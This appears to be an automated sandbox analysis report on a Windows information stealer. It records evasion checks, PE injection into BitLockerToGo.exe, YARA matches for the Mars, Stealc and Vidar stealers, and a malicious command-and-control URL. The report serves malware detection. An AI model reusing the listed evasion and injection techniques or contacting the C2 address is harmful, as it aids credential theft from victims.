Source: LisectAVT_2403002A_326.exe Static PE information: section name: .xdata
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000BA23BD push ecx; ret 0_2_000000C000BA23D0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000BA1F84 push ecx; ret 0_2_000000C000BA1F97
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000B86C7E pushad ; retf 0_2_000000C000B883B9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D31F84 push ecx; ret 0_2_000000C000D31F97
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D323BD push ecx; ret 0_2_000000C000D323D0
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000D16C7E pushad ; retf 0_2_000000C000D183B9
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000CE0AC5 push ecx; ret 0_2_000000C000CE0AD8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_030676C5 push ecx; ret 1_2_030676D8
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking computer name)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetComputerName,DecisionNodes,ExitProcess
Found evasive API chain (may stop execution after checking locale)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Found large amount of non-executed APIs
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe API coverage: 7.4 %
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03051120 GetSystemInfo, 1_2_03051120
Source: BitLockerToGo.exe, 00000001.00000002.1872504187.00000000033C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware`
Source: BitLockerToGo.exe, 00000001.00000002.1872504187.00000000033C7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: LisectAVT_2403002A_326.exe, 00000000.00000002.1890618818.00000225D3112000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03067B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_03067B4E
Contains functionality to dynamically determine API calls
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_0306918C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 1_2_0306918C
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Code function: 0_2_000000C000CDF1C0 mov eax, dword ptr fs:[00000030h] 0_2_000000C000CDF1C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03065DC0 mov eax, dword ptr fs:[00000030h] 1_2_03065DC0
Enables debug privileges
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03067B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 1_2_03067B4E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_030673DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 1_2_030673DD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_03069DC7 SetUnhandledExceptionFilter, 1_2_03069DC7

HIPS / PFW / Operating System Protection Evasion
barindex
Allocates memory in foreign processes
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 protect: page execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 value starts with: 4D5A Jump to behavior
Writes to foreign memory regions
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 3050000 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 2E9C008 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Queries volume information: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002A_326.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 1_2_030643C0 GetUserNameA, 1_2_030643C0

Stealing of Sensitive Information
barindex
Yara detected Go Injector
Source: Yara match File source: LisectAVT_2403002A_326.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.1894092597.00007FF6ABCF7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1703746830.00007FF6ABCF7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002A_326.exe PID: 6992, type: MEMORYSTR
Yara detected Mars stealer
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1871920101.0000000003050000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000A7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1871312660.00000225FA770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1805039527.00000225FA740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1871920101.0000000003050000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000A7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1871312660.00000225FA770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1805039527.00000225FA740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Go Injector
Source: Yara match File source: LisectAVT_2403002A_326.exe, type: SAMPLE
Source: Yara match File source: 00000000.00000002.1894092597.00007FF6ABCF7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.1703746830.00007FF6ABCF7000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: LisectAVT_2403002A_326.exe PID: 6992, type: MEMORYSTR
Yara detected Mars stealer
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1871920101.0000000003050000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000A7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1871312660.00000225FA770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1805039527.00000225FA740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa740000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ac8000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.LisectAVT_2403002A_326.exe.225fa770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a7c000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000a56000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.BitLockerToGo.exe.3050000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cf0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000cca000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000aa2000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.LisectAVT_2403002A_326.exe.c000ca4000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000002.1871920101.0000000003050000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000A7C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CCA000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000CF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889998486.000000C000C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1871312660.00000225FA770000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1889291210.000000C000AC8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1805039527.00000225FA740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1482336 Sample: LisectAVT_2403002A_326.exe Startdate: 25/07/2024 Architecture: WINDOWS Score: 100 12 Found malware configuration 2->12 14 Malicious sample detected (through community Yara rule) 2->14 16 Antivirus detection for URL or domain 2->16 18 7 other signatures 2->18 6 LisectAVT_2403002A_326.exe 2 2->6         started        process3 signatures4 20 Writes to foreign memory regions 6->20 22 Allocates memory in foreign processes 6->22 24 Injects a PE file into a foreign processes 6->24 9 BitLockerToGo.exe 6->9         started        process5 signatures6 26 Found evasive API chain (may stop execution after checking computer name) 9->26 28 Found evasive API chain (may stop execution after checking locale) 9->28
No contacted IP infos

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://193.143.1.226/129edec4272dc2c8.php true
  • Avira URL Cloud: malware
 unknown